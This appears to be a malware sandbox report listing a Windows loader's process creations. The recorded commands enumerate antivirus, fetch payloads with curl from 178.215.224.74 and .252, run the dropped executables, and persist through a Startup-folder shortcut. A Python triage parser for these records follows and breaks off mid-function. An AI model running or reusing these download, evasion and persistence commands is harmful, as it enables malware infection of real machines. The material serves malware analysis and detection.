Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032\
Source: curl.exe, 00000031.00000003.2784647329.0000000002D31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77A
Source: curl.exe, 00000018.00000003.2545162631.0000000002831000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000003.2668520821.0000000003542000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002B.00000003.2717621741.0000000002841000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002E.00000003.2734328426.0000000002BC1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000003.2827834731.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000003.2929488178.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005B.00000003.3090191494.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000063.00000003.3131480100.00000000034C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: curl.exe, 00000042.00000003.2874731169.0000000002EC1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000042.00000002.2876030793.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: curl.exe, 00000028.00000003.2693793870.00000000031E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77l'
Source: curl.exe, 0000001C.00000002.2618466664.00000000034D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004B.00000002.2945763230.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000003.2962294058.0000000002A11000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000003.2978571809.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000054.00000002.3000425346.0000000003029000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000057.00000003.3058248022.0000000002E51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004125F0 LeaveCriticalSection,CreateFileA,EnterCriticalSection,CreateFileA,GetKernelObjectSecurity,GetKernelObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetKernelObjectSecurity,SetKernelObjectSecurity,GetProcessHeap,HeapFree,CloseHandle,CreateFileA,CloseHandle, 52_2_004125F0
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit
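The process-creation records above are enough to write triage logic for this loader: every download is curl -s -o into the user's Temp folder from 178.215.224.74 or 178.215.224.252 under /v10/ukyh.php, and the xvgj= parameter is a URL-encoded base64 file name whose decoded values (azvw.exe, xhwq.zip, RevenueDevices.exe) match the dropped files named elsewhere in this report. The Python below is an added example, not part of the sandbox report and not code from the sample: it parses lines in the report's own "Source: ... Process created: ..." form (SAMPLE_LOG is constructed by copying records from above), extracts and decodes the curl downloads, and flags the AV enumeration via WMIC/SecurityCenter2, the systeminfo host profiling and the Startup-folder .url persistence. Reading jspo= as a stage or command selector is an assumption, since the report does not document the server-side meaning of the parameters, and the regexes assume the exact curl -s -o "<dest>" "<url>" argument order seen in these records.

```python
"""Triage helper for Joe Sandbox style process-creation records.

Added example, not part of the report. Parses "Source: <parent> Process created:
<image> <cmdline>" lines, extracts the curl downloads, decodes the base64 file
name in xvgj= and flags the recon/persistence behaviours seen in this sample.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: records copied from the report's process-creation list.
SAMPLE_LOG = r'''
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
'''

# Report record layout. Assumes the image path has no spaces (true for every record above).
RECORD_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+) ?(?P<cmdline>.*)$")
# The exact argument order used by this loader: curl -s -o "<dest>" "<url>".
CURL_RE = re.compile(r'curl\b.*?-o\s+"(?P<dest>[^"]+)"\s+"(?P<url>[^"]+)"', re.IGNORECASE)


def decode_xvgj(value):
    """Decode the xvgj= parameter (URL-encoded base64 file name); None if not base64."""
    try:
        return base64.b64decode(unquote(value), validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def parse_record(line):
    """Split one report line into parent, image and command line; skip 'unknown unknown'."""
    m = RECORD_RE.match(line.strip())
    if not m or m["image"] == "unknown":
        return None
    return {"parent": m["parent"], "image": m["image"], "cmdline": m["cmdline"]}


def extract_download(cmdline):
    """Pull host, path, jspo and the decoded payload name out of a curl command line."""
    m = CURL_RE.search(cmdline)
    if not m:
        return None
    url = m["url"]
    if "://" not in url:  # the report shows scheme-less URLs; curl defaults to http
        url = "http://" + url
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    xvgj = qs.get("xvgj", [None])[0]
    return {
        "dest": m["dest"],
        "host": parts.hostname,
        "path": parts.path,
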